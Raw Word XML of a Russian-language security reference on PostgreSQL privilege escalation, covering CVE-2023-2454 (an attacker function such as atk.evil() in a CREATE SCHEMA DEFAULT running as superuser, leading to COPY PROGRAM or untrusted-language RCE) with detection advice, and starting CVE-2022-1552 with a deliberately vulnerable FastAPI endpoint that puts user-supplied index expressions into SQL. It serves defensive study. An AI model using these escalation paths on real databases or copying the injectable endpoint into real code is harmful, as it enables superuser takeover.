          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">До фикса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выражение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверяется на корректность при объявлении DEFAULT, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">немедленно вызывает `atk.evil()`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для type-resolution. Защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не помогает, потому что имя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полностью квалифицировано — search_path вообще не используется при resolution.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исполняется под привилегиями admin (superuser).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После фикса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (15.3+/14.8+/...) — PostgreSQL применяет полный security restricted operation (SRO) sandbox к expressions в schema_element, что блокирует исполнение функций других owner-ов.</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При успешной эксплуатации —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выполняется с привилегиями admin-роли (типично superuser), что даёт RCE-вектор как в 3.7.2a (если функция на plperlu) или эскалацию до admin-роли через SET ROLE / SECURITY DEFINER chain. Из этой точки атакующий доступ к full superuser API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.7.1), CREATE FUNCTION в любом untrusted-языке (3.7.3), доступ ко всем схемам,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Дополнительный эффект: даже при отсутствии немедленного triggering — DEFAULT-выражение исполнится при первом INSERT в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (что admin или другая привилегированная роль может сделать впоследствии, например через тестовые seed-скрипты).</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PostgreSQL применяет защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к большинству DDL-операций, чтобы предотвратить hijack функций через подмену объектов в user-schemas (например,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atk.lower()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Этот механизм называется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">secure search_path enforcement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и работает для большинства DDL. До CVE-2023-2454 enforcement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не покрывал schema_element-формы CREATE SCHEMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для них использовался search_path вызывающей роли, а expressions с полностью-квалифицированными именами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обходили любую защиту через search_path, потому что квалификация имени делает search_path нерелевантным.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс — расширение SRO-sandbox на schema_element expressions и проверка ownership функций, вызываемых из DDL под привилегированной ролью. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/commands/schemacmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateSchemaCommand</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 (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 15.2, 14.7, 13.10, 12.14, 11.19. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15.3, 14.8, 13.11, 12.15, 11.20 (выпущены 11 мая 2023).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CREATE на БД (для создания собственной схемы atk)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CREATE FUNCTION в схеме atk (выдается автоматически owner-у схемы)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Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для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жертвы: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admin, выполняющий CREATE SCHEMA с user-controlled schema_element (типично superuser или владелец БД)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реалистичном сценарии — DBA-tool, multi-tenant onboarding, схема-init template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atk.evil() может использовать любой язык — plpgsql (для эскалации без RCE), plperlu/plpython3u (для прямого RCE если установлены).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нет специальных требований.</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CVE-2023-2454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7.5 (High, per PostgreSQL Project)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 мая 2023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 15.2, 14.7, 13.10, 12.14, 11.19</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15.3, 14.8, 13.11, 12.15, 11.20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SRO-sandbox bypass в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE SCHEMA ... schema_element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Privilege escalation от CREATE-on-DB до superuser</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SCHEMA ... CREATE TABLE ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный паттерн для atomic schema-bootstrap, используется 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multi-tenant onboarding-скриптах (типично admin создаёт схему tenant_X с typed-tables за один DDL-statement)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database migration tools (Liquibase, Flyway, Alembic могут генерировать такой SQL для full schema setup)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test-fixtures (pytest-postgresql, factory-boy создают чистую схему для каждого теста)</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ddl_command_start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ddl_command_end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для CREATE SCHEMA с filter по schema_element, содержащему вызовы функций из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не-системных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> схем (не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не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Это статический сканер: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не должен ссылаться на функции из user-schemas.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-выводе: новые DEFAULT-выражения, ссылающиеся на функции из чужих owner-ов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">atk.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для DEFAULT в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_*.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицах).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audit-логах: CREATE SCHEMA от superuser, где payload содержит подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;schema&gt;.&lt;func&gt;()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с schema не равной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_&lt;X&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или другой ожидаемой).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На версиях PG ≤ 15.2 / 14.7 / 13.10 / 12.14 / 11.19 — все CREATE SCHEMA с user-controlled schema_element стоит ревьюить.</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Уязвимы все ветки PG до фикса 11.05.2023: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Ветка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 до</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15.3</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14.8</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12.15</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11.19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11.20 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях PG ≥ 15.3 / 14.8 / 13.11 / 12.15 / 11.20 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — schema_element expressions выполняются в SRO-sandbox, ссылки на user-defined функции из других owner-ов блокированы.</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общий механизм защиты от schema-hijack. Та же угроза, но в другом контексте (вызов SECURITY DEFINER функции вместо schema_element).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 Extension scripts CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой путь подмены объекта в admin-DDL. Граница: 3.13.4 — подмена через CREATE EXTENSION; 3.13.2 — подмена через CREATE SCHEMA.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3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальные RCE-векторы, к которым эскалирует CVE-2023-2454 (если atk.evil() использует untrusted PL).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связанный класс уязвимостей по неполной квалификации имён в DDL.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4.3 (Хронология 2023)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст 11.05.2023 fixes (CVE-2023-2454, CVE-2023-2455).</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CVE-2023-2454 — https://www.postgresql.org/support/security/CVE-2023-2454/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cve.news разбор CVE-2023-2454 — https://www.cve.news/cve-2023-2454/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«CREATE SCHEMA» (schema_element форма) — https://www.postgresql.org/docs/current/sql-createschema.html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«Security» (secure schema usage) — https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATTERNS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Release notes 15.3 (раздел Security Fixes) — https://www.postgresql.org/docs/release/15.3/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NIST NVD: CVE-2023-2454 — https://nvd.nist.gov/vuln/detail/CVE-2023-2454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R12 (sources/research.md, строки 209–222)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.3 Index expressions + autovacuum/REINDEX (CVE-2022-1552)</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До PostgreSQL 14.3 (и параллельных minor-фиксов) PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не применял security restricted operation (SRO) sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при вычислении index-expressions во время </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE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REINDEX</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CLUSTER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REFRESH MATERIALIZED VIEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_amcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий с правом CREATE на любой схеме создавал таблицу с index-expression, ссылающимся на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 функция выполнялась под привилегиями той роли, которая запустила обслуживающую команду. Поскольку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">autovacuum demon работает как superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и регулярно запускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на всех таблицах автоматически, эта атака требовала только времени — без активного triggering.</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app/api/reports/custom_tables.py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@router.post("/reports/tables/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def create_report_table(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    indexed_expression: str,  # user-supplied expression для function-based index</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multi-tenant analytics: пользователь создаёт свою отчётную таблицу</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # с произвольным index expression для performance optimization</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CREATE TABLE tenant_X.{name} (id serial, val numeric);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE INDEX ON tenant_X.{name} (({indexed_expression}));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await session.execute(query)</w:t>
